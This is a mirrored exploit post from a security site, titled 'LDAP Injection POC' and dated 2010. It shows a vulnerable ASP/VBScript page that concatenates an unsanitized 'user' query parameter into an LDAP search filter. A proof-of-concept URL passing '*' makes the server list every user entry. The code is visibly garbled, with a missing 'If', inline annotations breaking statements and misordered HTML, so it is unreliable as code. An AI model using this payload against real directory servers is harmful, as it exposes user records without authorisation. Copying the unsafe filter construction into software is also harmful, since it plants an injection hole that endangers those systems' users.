首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LDAP Injection POC
来源:www.yogyacarderlink.web.id 作者:mc2_s3lector 发布时间:2010-02-10  

[+] Vurnerebility: LDAP Injection
[+] Category  : Implemented Web exploit   
[+] Category  : Attack Technique
[+] Author   : mc2_s3lector
[+] dork     : X/o\" 
[+] Contact  :  www.yogyacarderlink.web.id
[+] date  : 4-2-10
[+] biGthank to  : Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all*.indonesian like a coding,

---------------------------------------------------------------------------------------------------------------------------------------------------
Directory acces protokol/directory manipulation,protokol breaker->standar protocol,query
custom statement,page request,componen execute command,data base server,web apps services
modify,remove etc.
---------------------------------------------------------------------------------------------------------------------------------------------------

code:
<html>
<head>
<body>
<%@ Language=VBScript %>
<%
Dim userName
Dim filter
Dim ldapObj
Const LDAP_SERVER = "ldap.example"
userName = Request.QueryString("user")<-----------*1(LOOK THIS BUG LINE PARAMETER USER=EMPTY)

( userName = "" ) then
Response.Write("<b>Invalid
request. Please specify a
valid user name</b><br>")
Response.End()
end if

filter= "(uid=" + CStr(userName) + //((*1))
userName used to initialize filter variable on this line direct query LDAP call to finf filter on ((*.3))
")" ' searching
for the user entry
'Creat LDAP object and setting
the base dn
Set ldapObj =
Server.CreateObject("IPWorksASP.LDAP")
ldapObj.ServerName = LDAP_SERVER
ldapObj.DN =
"ou=people,dc=spilab,dc=com"
'Setting the search filter
ldapObj.SearchFilter = ((*.3))filter<---call SearchFilter on this line
ldapObj.Search
'Showing the user ennumeratin info
While ldapObj.result = ((1*.4 to *.5))
Response.Write("<p>")
Write("<b><u>User
information for : " +
ldapObj.AttrValue(0) + "</u></b><br>")
For i = 0 To ldapObj.AttrCount -1
Response.Write("<b>" +
ldapObj.AttrType(i) +
"</b> : " + ldapObj.AttrValue(i) + "<br>" )
Response.Write("</p>")
Wend ((*.5))
%>
</head>
</body>
</html>
---------------------------------------------------------------------------------------------------------------------------------------------------
control over LDAP to querry =server LDAP & get query result from ((*.4 to *.5))

POC:

http://server/ldapsearch.asp?user=* <----send the * character in the parameter user,result flter variable in code to be initialized with
(uid=*). The resulting LDAP statement will make the server return
-------------------------------------------------------------------------------------------------------------------------------------------------
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux bin/cat /etc/passwd 43 b
·PLS PLA‏ WMDownloader (P
·M.J.M. Quick Player v1.2 Unico
·Vermillion FTP Daemon PORT Com
·Ipswitch IMail Server - IMAP4
·This is a proof of concept exp
·GNOME Nautilus code execution
·PLS PLA WMDownloader proof of
·Magic_Block1_2 suffers from a
·Microsoft Internet Explorer ve
·feedDemon v3.1.0.9 opml File B
·Solaris/Open Solaris UCODE_GET
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved